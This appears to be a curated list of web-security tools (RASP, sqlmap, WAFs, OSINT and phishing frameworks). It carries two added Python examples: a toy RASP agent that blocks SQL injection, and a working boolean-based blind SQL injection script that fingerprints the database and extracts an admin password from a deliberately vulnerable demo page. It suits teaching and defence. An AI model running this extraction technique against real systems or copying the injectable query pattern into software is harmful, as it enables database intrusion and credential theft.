Runtime Application Self-Protection

Sqreen – Sqreen is a Runtime Application Self-Protection (RASP) solution for software teams. An in-app agent instruments and monitors the app. Suspicious user activity is reported and attacks are blocked at runtime without code modification or traffic redirection.
OpenRASP – An open source RASP solution actively maintained by Baidu Inc. With a context-aware detection algorithm the […]
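To make the two claims above concrete (an in-process agent that hooks the database driver so the application needs no code changes, and a "context-aware" decision that uses the parameters of the request being served), here is an added toy RASP agent in Python. It is illustrative code written for this page, not Sqreen's or OpenRASP's implementation. Everything in it is an assumption: the hook point is `sqlite3.connect`, request parameters are carried in a thread-local, and the structure check is a simplification of the token-based idea (a request parameter may legitimately contribute only a single SQL token; if the value found in the statement tokenises to several tokens including a quote, comment marker or SQL keyword, the statement has been rewritten).

```python
"""Toy RASP agent (added example; not Sqreen's or OpenRASP's code)."""
import re
import sqlite3
import threading

_request = threading.local()      # parameters of the request currently being served
KEYWORDS = {"or", "and", "union", "select", "sleep", "benchmark", "load_extension"}
# crude SQL tokenizer: quoted strings, comments, numbers, words, single punctuation
TOKEN = re.compile(
    r"'(?:[^']|'')*'|\"[^\"]*\"|--[^\n]*|/\*.*?\*/|\d+(?:\.\d+)?|\w+|[^\s\w]", re.S)


class AttackBlocked(Exception):
    """Raised by the agent instead of letting the statement reach the database."""


def rewrites_structure(sql, value):
    """Simplified context-aware check (assumption, see lead-in): a request
    parameter that appears verbatim in the SQL text and tokenises into several
    tokens, one of which is a quote, comment, separator or keyword, has changed
    the statement's structure rather than just filling a literal."""
    if not isinstance(value, str) or len(value) < 2 or value not in sql:
        return False
    toks = TOKEN.findall(value)
    if len(toks) < 2:
        return False
    return any(t.lower() in KEYWORDS or t[0] in "'\";" or t.startswith(("--", "/*"))
               for t in toks)


class GuardedCursor(sqlite3.Cursor):
    """Cursor whose execute() is inspected by the agent before it runs."""
    def execute(self, sql, parameters=()):
        for name, value in getattr(_request, "params", {}).items():
            if rewrites_structure(sql, value):
                raise AttackBlocked(f"parameter {name!r} rewrites SQL: {sql!r}")
        return super().execute(sql, parameters)


class GuardedConnection(sqlite3.Connection):
    def cursor(self, factory=GuardedCursor):
        return super().cursor(factory=factory)


_real_connect = sqlite3.connect

def _hooked_connect(*args, **kwargs):
    kwargs.setdefault("factory", GuardedConnection)
    return _real_connect(*args, **kwargs)

sqlite3.connect = _hooked_connect   # the instrumentation point; the app below is untouched


# --- the application, written as if no agent existed (constructed sample) ---
def build_app():
    conn = sqlite3.connect(":memory:")   # transparently a GuardedConnection
    conn.cursor().execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
    conn.cursor().execute("INSERT INTO users (name) VALUES ('alice'), ('bob')")
    return conn

def find_user(conn, username):
    # deliberately vulnerable concatenation: the kind of code RASP is deployed around
    sql = f"SELECT id, name FROM users WHERE name = '{username}'"
    return conn.cursor().execute(sql).fetchall()

def handle_request(conn, params):
    """Request entry point: the agent records the parameters, then the handler runs."""
    _request.params = params
    try:
        return find_user(conn, params["username"])
    except AttackBlocked as exc:
        return ("blocked", str(exc))
    finally:
        _request.params = {}


if __name__ == "__main__":
    app = build_app()
    print(handle_request(app, {"username": "alice"}))
    print(handle_request(app, {"username": "' OR '1'='1"}))
```

The heuristic is deliberately small: a legitimate search term such as `rock and roll` would be flagged, which is why real agents tokenise the whole statement and measure how many tokens the parameter spans instead of keyword-matching the value alone. The part that matters for the RASP concept is the placement: the check runs inside the process at the driver boundary, after any WAF and with full knowledge of the request, and the application never calls the agent.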

Scanning / Pentesting

sqlmap – sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching […]
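The three steps named in that description (detecting the injection, fingerprinting the backend, fetching data) can be shown end to end with boolean-based blind injection, one of the techniques sqlmap automates. The block below is an added example written for this page, not sqlmap's code: the target is a constructed SQLite-backed "product search" page with a concatenated parameter, `oracle()` turns the page's Found/No results difference into a one-bit answer, and `extract()` recovers an arbitrary SQL expression one character at a time by bisecting on its code point, which is how sqlmap's blind data retrieval works in principle. The page, the table contents and the SQLite-specific functions (`unicode()`, `sqlite_version()`) are assumptions for this demonstration.

```python
"""Boolean-based blind SQL injection: detect, fingerprint, extract.
Added example, not sqlmap's code. Target is a constructed in-memory app."""
import sqlite3

# constructed target: a product page whose ?search= value is concatenated into SQL
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
INSERT INTO products (name) VALUES ('widget'), ('gadget');
CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT);
INSERT INTO users (name, password) VALUES ('admin', 's3cret');
""")

def vulnerable_page(search):
    """Returns the response body for ?search=<value>. Deliberately injectable."""
    sql = f"SELECT name FROM products WHERE name = '{search}'"
    try:
        rows = _conn.execute(sql).fetchall()
    except sqlite3.Error:
        return "Internal Server Error"
    return "Found: " + ", ".join(r[0] for r in rows) if rows else "No results"


# --- attacker side ---------------------------------------------------------
def oracle(condition):
    """One bit per request: does the page still show a row when the injected
    boolean `condition` is ANDed onto a known-good search?"""
    return vulnerable_page(f"widget' AND ({condition}) --").startswith("Found")

def detect_injection():
    """sqlmap's first step: the base request works, a TRUE payload gives the
    same page and a FALSE payload gives a different one."""
    base_ok = vulnerable_page("widget").startswith("Found")
    return base_ok and oracle("1=1") and not oracle("1=2")

def extract(expression, max_len=64):
    """Recover the string value of an SQL expression character by character.
    Each position costs ~7 requests (binary search over ASCII code points)."""
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"length(({expression})) >= {pos}"):
            break                       # ran past the end of the value
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({expression}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result

def fingerprint():
    """Backend version, the basis for choosing further payloads."""
    return extract("sqlite_version()")

def dump_admin_password():
    return extract("(SELECT password FROM users WHERE name = 'admin')")

def fingerprint_is_exact():
    """Self-check only possible here because we own the target."""
    return fingerprint() == sqlite3.sqlite_version


if __name__ == "__main__":
    print("injectable:", detect_injection())
    print("backend:", fingerprint())
    print("admin password:", dump_admin_password())
```

The cost model is what makes a tool like sqlmap worthwhile: every character of every value is roughly seven requests here, and a real engine additionally has to pick the injection technique (error-, time- or UNION-based when available), handle encoding and WAF evasion, and fall back gracefully when the oracle is noisy. The parameterised fix (`WHERE name = ?` with the value passed separately) removes the oracle entirely.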

Web Application Firewall

ModSecurity – ModSecurity is a toolkit for real-time web application monitoring, logging, and access control.
NAXSI – NAXSI is an open-source, high performance, low rules maintenance WAF for NGINX. NAXSI stands for Nginx Anti XSS & SQL Injection.
sql_firewall – SQL Firewall Extension for PostgreSQL.
ironbee – IronBee is an open source project to build a universal […]

Organization

OWASP – The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software.
Portswigger – PortSwigger offers tools for web application security, testing and scanning. Choose from a wide range of security tools and identify the very latest vulnerabilities.
Let’s Encrypt – Let’s Encrypt is a […]

Development

API Security in Action – Book covering API security including secure development, token-based authentication, JSON Web Tokens, OAuth 2, and Macaroons. (early access, published continuously, final release summer 2020)
Secure by Design – Book that identifies design patterns and coding styles that make many security vulnerabilities less likely. (early access, published continuously, final release […]

Social Engineering / OSINT

Gophish – An Open-Source Phishing Framework.
Maltego – Maltego is an open source intelligence and graphical link analysis tool for gathering and connecting information for investigative tasks. Maltego is a Java application that runs on Windows, Mac and Linux.
Social Engineering Toolkit (SET) – Social Engineering Toolkit (or SET) is an open-source, Python-driven toolkit aimed at […]